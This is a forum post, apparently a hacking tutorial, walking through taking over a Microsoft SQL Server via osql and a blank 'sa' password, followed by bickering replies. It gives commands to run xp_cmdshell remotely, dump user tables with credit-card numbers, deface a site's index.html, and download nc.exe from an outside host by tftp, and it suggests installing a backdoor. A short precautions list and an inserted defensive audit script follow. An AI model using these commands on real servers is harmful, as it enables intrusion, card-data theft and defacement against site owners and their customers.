Breaking a SQL database Part 2

CourtneyDS

Part 2

Code:
C:\> osql.exe -?
osql: unknown option ?
usage: osql              [-U login id]          [-P password]
  [-S server]            [-H hostname]          [-E trusted connection]
  [-d use database name] [-l login timeout]     [-t query timeout]
  [-h headers]           [-s colseparator]      [-w columnwidth]
  [-a packetsize]        [-e echo input]        [-I Enable Quoted Identifiers]
  [-L list servers]      [-c cmdend]
  [-q "cmdline query"]   [-Q "cmdline query" and exit]
  [-n remove numbering]  [-m errorlevel]
  [-r msgs to stderr]    [-V severitylevel]
  [-i inputfile]         [-o outputfile]
  [-p print statistics]  [-b On error batch abort]
  [-O use Old ISQL behavior disables the following]
      <EOF> batch processing
      Auto console width scaling
      Wide messages
      default errorlevel is -1 vs 1
  [-? show syntax summary]


------------------------------------------------

Well.. this displays the help of the osql tool ... It's clear from the help what we have to do now. Type

C:\> osql.exe -S 123.321.123.3 -U sa -P " "
1>
That's what we get if we log in successfully; otherwise we will get an error message such as login failed for user "sa" ...

Now if you want to execute any command on the remote machine then just use the "xp_cmdshell" default stored procedure ...

C:\> osql.exe -S 123.321.123.3 -U sa -P '' -Q "exec master..xp_cmdshell 'dir >dir.txt'"

I would prefer to use the -Q option instead of -q because it exits after executing the query ... In the same manner we can execute any command on the remote machine ... We can even upload or download any files on/from the remote machine ...

A smart attacker will install a backdoor on the machine to gain access in future also :). Now as I had explained earlier we can use the "information_schema.tables" to get the list of tables and contents of it ...

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select * from information_schema.tables"

After getting the table names, look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select * from users"

And

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select username, creditcard, expdate from users"

Code:
Output:

Username         Some Numbers ?           expdate
-----------      ------------             ----------
David Lindon     1234567890987654         2004-10-03 00:00:00.000
Overlord         0987654321234567         2004-07-02 00:00:00.000
jasynder         2312345678909878         2004-08-07 00:00:00.000
Eyelfixit        3456789012345678         2004-03-02 00:00:00.000

Write something in index.html file ?

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "exec master..xp_cmdshell 'echo defaced by Chintan > C:\inetpub\wwwroot\index.html'"

Want to upload any file on the remote system ...

C:\> osql.exe -S 198.188.178.1 -U sa -P " " -Q "exec master..xp_cmdshell 'tftp 234.432.12.21 GET nc.exe c:\nc.exe'"

Precautionary measures
---------------------------
Code:
* Change the default password for sa.
* Delete all the default stored procedures.
* Filter out all the characters like ', ", --, :, etc.
* Keep up to date with patches
* Block ports 1433/1434 (MS SQL) and 1521 (Oracle) using firewalls ...


Sincerely
Courtney_DS
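
The precautionary measures above, written out as an audit-and-fix script for the server side. This is an added example, not part of the original post. It assumes SQL Server 2005 or later (where sys.sql_logins, PWDCOMPARE and the 'xp_cmdshell' configuration option exist) and a sysadmin session, and it turns xp_cmdshell off through sp_configure rather than deleting the procedure. The password value is a placeholder.

```sql
-- Added example, not from the original post.
-- Assumes SQL Server 2005 or later and a sysadmin session.

-- 1. Locate the built-in sa account even if it was renamed
--    (its SID is always 0x01) and show whether it is enabled.
SELECT name, is_disabled, is_policy_checked
FROM sys.sql_logins
WHERE sid = 0x01;

-- 2. List SQL logins whose password is blank or identical to the
--    login name, the condition the post relies on for sa.
SELECT name,
       is_disabled,
       CASE WHEN PWDCOMPARE('', password_hash) = 1
            THEN 'blank password'
            ELSE 'password equals login name'
       END AS finding
FROM sys.sql_logins
WHERE PWDCOMPARE('', password_hash) = 1
   OR PWDCOMPARE(name, password_hash) = 1;

-- 3. Check whether xp_cmdshell is enabled (value_in_use = 1 means yes).
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 4. Give sa a strong password under the Windows password policy,
--    then disable the login. The password below is a placeholder;
--    replace it, and use the name returned by step 1 if sa was renamed.
ALTER LOGIN sa
    WITH PASSWORD = N'<REPLACE_WITH_LONG_RANDOM_PASSWORD>',
         CHECK_POLICY = ON;
ALTER LOGIN sa DISABLE;

-- 5. Turn xp_cmdshell off. It is an advanced option, so advanced
--    options are shown for the change and hidden again afterwards.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Steps 1 to 3 only read state and can be run on their own as a periodic check; any row returned by step 2 is a login that should be fixed before the instance is reachable on port 1433.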
 
do it up girlfriend, will take me some practice but ill get it. gotta modify it but its a fukin kick arse code
 
you cant do it beioch, you dont even know what it is n ur tryin to act like you do! jus shut up dude cuz ur a fool!
 
No, I think not. Again you are no one to tell me what to do. Oh and if courtneyBS keeps putting up old, redundant information to look good then I will say something.


Sorry, ahahahahahahahahaha
 
eyelfixit said:
No, I think not. Again you are no one to tell me what to do. Oh and if courtneyBS keeps putting up old, redundant information to look good then I will say something.


Sorry, ahahahahahahahahaha

say somethin, you aint sayin sheoit, all ur doin is copyin from other sites, you dont know nothin n peeps can see that dude. ur not doin good makin urself look like ur important! go find a girl dude cuz this aint ur bag, ur ignorant bro!
 
Meager, weak argument.

I will not leave.

I do not think I'm better than the next guy/girl.

I will not be told (especially by you) what to do or say.

I am not here to feel important or look good. Frankly I don't really care what people think of me.

Try again, this isn't working so well for you. :)
 
eyelfixit said:
Meager, weak argument.

I will not leave.

I do not think I'm better than the next guy/girl.

I will not be told (especially by you) what to do or say.

I am not here to feel important or look good. Frankly I don't really care what people think of me.

Try again, this isn't working so well for you. :)


nobody cares what you think dude. you aint no admin on lti cuz you cant be trusted! courts n her boys busted ur arse up deleting all ur posts n ur dumb! nobody wants sheoit to work against you bro, ur makin more a fool of yourself wit every post you make!
 
eyelfixit said:
I was just telling other people that what you say is false. that's all. :)


ah ha ha ha, there are peeps postin code that can be altered real quick n ur postin cut and paste crap. give it a rest bro unless you like makin a fool of urself.
 